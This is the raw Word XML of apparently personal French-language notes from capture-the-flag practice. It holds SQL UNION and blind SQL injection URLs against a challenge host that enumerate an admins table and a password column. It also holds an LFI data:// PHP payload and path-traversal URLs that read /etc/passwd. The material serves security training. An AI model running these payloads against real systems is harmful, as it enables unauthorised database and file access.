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188" w:rsidRDefault="009A2CA9">
      <w:r>
        <w:t>SQL Union :</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">UNION SELECT table_name,2 FROM </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>information_schemas.tables</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> --</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="192B171D" wp14:editId="3066613E">
            <wp:extent cx="5760720" cy="29063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C8" w:rsidRDefault="00AC2CC8"/>
    <w:p w:rsidR="00AC2CC8" w:rsidRDefault="00AC2CC8"/>
    <w:p w:rsidR="00AC2CC8" w:rsidRDefault="00AC2CC8"/>
    <w:p w:rsidR="00AC2CC8" w:rsidRDefault="00AC2CC8">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="01C324FB" wp14:editId="7BD055A1">
            <wp:extent cx="5760720" cy="28206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C8" w:rsidRDefault="00AC2CC8"/>
    <w:p w:rsidR="00AC2CC8" w:rsidRDefault="00AC2CC8"/>
    <w:p w:rsidR="00AC2CC8" w:rsidRDefault="00AC2CC8"/>
    <w:p w:rsidR="00AC2CC8" w:rsidRDefault="00AC2CC8">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5644F97C" wp14:editId="0C6C64DD">
            <wp:extent cx="5760720" cy="18129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8F" w:rsidRDefault="0065298F"/>
    <w:tbl>
      <w:tblPr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8"/>
        <w:gridCol w:w="4"/>
      </w:tblGrid>
      <w:tr w:rsidR="0065298F" w:rsidRPr="0065298F" w:rsidTr="0065298F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:tbl>
            <w:tblPr>
              <w:tblW w:w="129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60"/>
            </w:tblGrid>
            <w:tr w:rsidR="0065298F" w:rsidRPr="0065298F">
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="0" w:type="auto"/>
                  <w:noWrap/>
                  <w:vAlign w:val="center"/>
                  <w:hideMark/>
                </w:tcPr>
                <w:p w:rsidR="0065298F" w:rsidRPr="0065298F" w:rsidRDefault="0065298F" w:rsidP="0065298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>
                    <w:t>LFI :</w:t>
                  </w:r>
                  <w:r>
                    <w:br/>
                  </w:r>
                </w:p>
                <w:p w:rsidR="0065298F" w:rsidRPr="0065298F" w:rsidRDefault="0065298F" w:rsidP="0065298F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65298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8255" cy="8255"/>
                        <wp:effectExtent l="0" t="0" r="0" b="0"/>
                        <wp:docPr id="4" name="Image 4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5298F" w:rsidRPr="0065298F" w:rsidRDefault="0065298F" w:rsidP="0065298F">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto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5298F" w:rsidRPr="0065298F" w:rsidRDefault="0065298F" w:rsidP="0065298F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z w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="fr-FR"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="0065298F" w:rsidRDefault="0065298F" w:rsidP="00652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gramStart"/>
      <w:r w:rsidRPr="0065298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data://text/plain,&lt;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0065298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?php </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0065298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echo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0065298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base64_encode(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0065298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file_get_contents</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0065298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("</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0065298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index.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0065298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")); ?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0065298F" w:rsidRDefault="0065298F" w:rsidP="00652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65298F" w:rsidRDefault="0065298F" w:rsidP="0065298F">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId8" w:tgtFrame="_blank" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Lienhypertexte"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="1155CC"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:rPr>
          <w:t>http://example.com/index.php?page=../../../var/www/private/../../../etc/passwd</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00D57507" w:rsidRDefault="00D57507" w:rsidP="0065298F">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D57507" w:rsidRPr="00D57507" w:rsidRDefault="00D57507" w:rsidP="00D57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9" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00D5750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http://example.com/index.php?page=a/./.[ADD</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00D5750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MORE]/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D5750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etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D5750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/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D5750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passwd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00D57507" w:rsidRDefault="00D57507" w:rsidP="00D57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10" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00D57507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fr-FR"/>
          </w:rPr>
          <w:t>http://example.com/index.php?page=a/../../../../[ADD</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00D5750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MORE]../../../../../etc/passwd</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC21E9" w:rsidRDefault="00AC21E9" w:rsidP="00D57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AC21E9" w:rsidRDefault="00AC21E9" w:rsidP="00D57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2CEF5361" wp14:editId="78FAE9D2">
            <wp:extent cx="5760720" cy="121285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E9" w:rsidRDefault="00AC21E9" w:rsidP="00D57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5497234A" wp14:editId="45319EA8">
            <wp:extent cx="5760720" cy="1343660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E9" w:rsidRDefault="00AC21E9" w:rsidP="00D57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AC21E9" w:rsidRDefault="00AC21E9" w:rsidP="00D57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13" w:history="1">
        <w:r w:rsidRPr="000D5396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https://www.base64decode.org/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pour décoder</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC21E9" w:rsidRDefault="00AC21E9" w:rsidP="00D57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AC21E9" w:rsidRDefault="00AC21E9" w:rsidP="00D57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AC21E9" w:rsidRDefault="00AC21E9" w:rsidP="00D57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AC21E9" w:rsidRDefault="00AC21E9" w:rsidP="00D57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AC21E9" w:rsidRPr="00D57507" w:rsidRDefault="00AC21E9" w:rsidP="00D57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UNION SQL BLIND :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id = 3 return vrai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id = 4 return rien</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D57507" w:rsidRDefault="00D57507" w:rsidP="00652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AC21E9" w:rsidRDefault="00AC21E9" w:rsidP="00652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AC21E9" w:rsidRDefault="00AC21E9" w:rsidP="00652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gramStart"/>
      <w:r w:rsidRPr="00AC21E9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chall.bunkerity.com:8002/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AC21E9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article.php</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00AC21E9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?id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AC21E9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=3 AND </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AC21E9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database</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AC21E9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() LIKE ‘b%’</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F323EB" w:rsidRDefault="00F323EB" w:rsidP="00652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F323EB" w:rsidRDefault="00D27927" w:rsidP="00652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14" w:history="1">
        <w:r w:rsidRPr="000D5396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http://chall.bunkerity.com:8002/check.php?id=3%20UNION%20SELECT%20table_name,1,2%20FROM%20information_schema.tables%20--</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00D27927" w:rsidRDefault="00D27927" w:rsidP="00652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D27927" w:rsidRDefault="00D27927" w:rsidP="00652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FC6E9C" w:rsidRDefault="00454642" w:rsidP="00FC6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15" w:history="1">
        <w:r w:rsidRPr="000D5396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http://chall.bunkerity.com:8002/check.php?id=3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and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exists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(select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table_name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="00D27927" w:rsidRPr="00D2792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fro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information_schema.tables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where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table_schema</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00FC6E9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="00FC6E9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like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%27vul%</w:t>
      </w:r>
      <w:r w:rsidR="00FC6E9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%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27</w:t>
      </w:r>
      <w:r w:rsidR="00FC6E9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and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00FC6E9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table_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00FC6E9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="00FC6E9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like</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00FC6E9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%27admins</w:t>
      </w:r>
      <w:r w:rsidR="00FC6E9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%%27) </w:t>
      </w:r>
      <w:r w:rsidR="00FC6E9C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-- </w:t>
      </w:r>
      <w:r w:rsidR="00FC6E9C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</w:r>
      <w:r w:rsidR="00FC6E9C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:br/>
        <w:t>return vrais</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FC6E9C" w:rsidRDefault="00FC6E9C" w:rsidP="00FC6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FC6E9C" w:rsidRDefault="00FC6E9C" w:rsidP="00FC6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16" w:history="1">
        <w:r w:rsidRPr="000D5396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http://chall.bunkerity.com:8002/check.php?id=3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and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exists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(select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table_name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2792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fro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information_schema.tables</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00044F6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where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table_schema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=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%27vul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n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%27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and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table_name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= %27admins%27</w:t>
      </w:r>
      <w:r w:rsidR="00044F6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) and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00044F6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exists</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00044F6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 (select </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00044F6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column_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00044F6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="00044F6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from</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00044F6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="00044F6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information_schema.columns</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00044F6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="00044F6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where</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00044F6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="00044F6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column_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00044F6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r w:rsidR="008D0F6E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=</w:t>
      </w:r>
      <w:r w:rsidR="00044F66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r w:rsidR="008D0F6E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%27pass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%27) --</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FC6E9C" w:rsidRDefault="00FC6E9C" w:rsidP="00652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</w:p>
    <w:p w:rsidR="008D0F6E" w:rsidRDefault="008D0F6E" w:rsidP="00652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8D0F6E" w:rsidRDefault="008D0F6E" w:rsidP="00652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colonne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existante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pass</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="008D0F6E" w:rsidRDefault="008D0F6E" w:rsidP="00652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8D0F6E" w:rsidRDefault="008D0F6E" w:rsidP="008D0F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17" w:history="1">
        <w:r w:rsidRPr="000D5396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http://chall.bunkerity.com:8002/check.php?id=3</w:t>
        </w:r>
      </w:hyperlink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and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exists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(select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table_name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 w:rsidRPr="00D2792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fro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information_schema.tables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where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table_schema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= %27vuln%27 and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table_name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= %27admins%27) and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exists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 (select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column_name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from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information_schema.columns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where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column_name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= %27pass%27) --</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008D0F6E" w:rsidRDefault="008D0F6E" w:rsidP="00652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bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w:rsidR="008D0F6E" w:rsidRDefault="008D0F6E" w:rsidP="00652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FC6E9C" w:rsidRDefault="00FC6E9C" w:rsidP="00652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FC6E9C" w:rsidRDefault="00FC6E9C" w:rsidP="00652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:rsidR="00E13B52" w:rsidRDefault="00E13B52">
      <w:p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br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E13B52" w:rsidRPr="0065298F" w:rsidRDefault="00E13B52" w:rsidP="006529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1EA758A0" wp14:editId="03FDC5F0">
            <wp:extent cx="5760720" cy="19310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8F" w:rsidRDefault="0065298F"/>
    <w:sectPr w:rsidR="00652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24"/>
    <w:rsid w:val="00044F66"/>
    <w:rsid w:val="00272524"/>
    <w:rsid w:val="00454642"/>
    <w:rsid w:val="004E244F"/>
    <w:rsid w:val="0065298F"/>
    <w:rsid w:val="008D0F6E"/>
    <w:rsid w:val="00975B28"/>
    <w:rsid w:val="009A2CA9"/>
    <w:rsid w:val="00AC21E9"/>
    <w:rsid w:val="00AC2CC8"/>
    <w:rsid w:val="00D27927"/>
    <w:rsid w:val="00D57507"/>
    <w:rsid w:val="00E13B52"/>
    <w:rsid w:val="00F323EB"/>
    <w:rsid w:val="00FC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BC45C"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{7A2D6411-DB78-4AF0-A72F-00ADAD7C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F6E"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Titre3">
    <w:name w:val="heading 3"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="Titre3Car"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="006529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5298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qu">
    <w:name w:val="qu"/>
    <w:basedOn w:val="Policepardfaut"/>
    <w:rsid w:val="0065298F"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="gd">
    <w:name w:val="gd"/>
    <w:basedOn w:val="Policepardfaut"/>
    <w:rsid w:val="0065298F"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="go">
    <w:name w:val="go"/>
    <w:basedOn w:val="Policepardfaut"/>
    <w:rsid w:val="0065298F"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="g3">
    <w:name w:val="g3"/>
    <w:basedOn w:val="Policepardfaut"/>
    <w:rsid w:val="0065298F"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hb">
    <w:name w:val="hb"/>
    <w:basedOn w:val="Policepardfaut"/>
    <w:rsid w:val="0065298F"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="g2">
    <w:name w:val="g2"/>
    <w:basedOn w:val="Policepardfaut"/>
    <w:rsid w:val="0065298F"/>
  </w:style>
  <w:style w:type="character" w:styleId="Lienhypertexte">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="Policepardfaut"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="006529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1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452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9891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9005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721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5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index.php?page=../../../var/www/private/../../../etc/passwd" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.base64decode.org/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6.png"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://chall.bunkerity.com:8002/check.php?id=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hall.bunkerity.com:8002/check.php?id=3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hyperlink" Target="http://chall.bunkerity.com:8002/check.php?id=3" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://example.com/index.php?page=a/../../../../%5bADD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example.com/index.php?page=a/./.%5bADD" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://chall.bunkerity.com:8002/check.php?id=3%20UNION%20SELECT%20table_name,1,2%20FROM%20information_schema.tables%20--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 47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Pago Adrien</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Pago Adrien</cp:lastModifiedBy>
  <cp:revision>5</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-02-21T07:51:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-02-21T11:01:00Z</dcterms:modified>
</cp:coreProperties>
</file>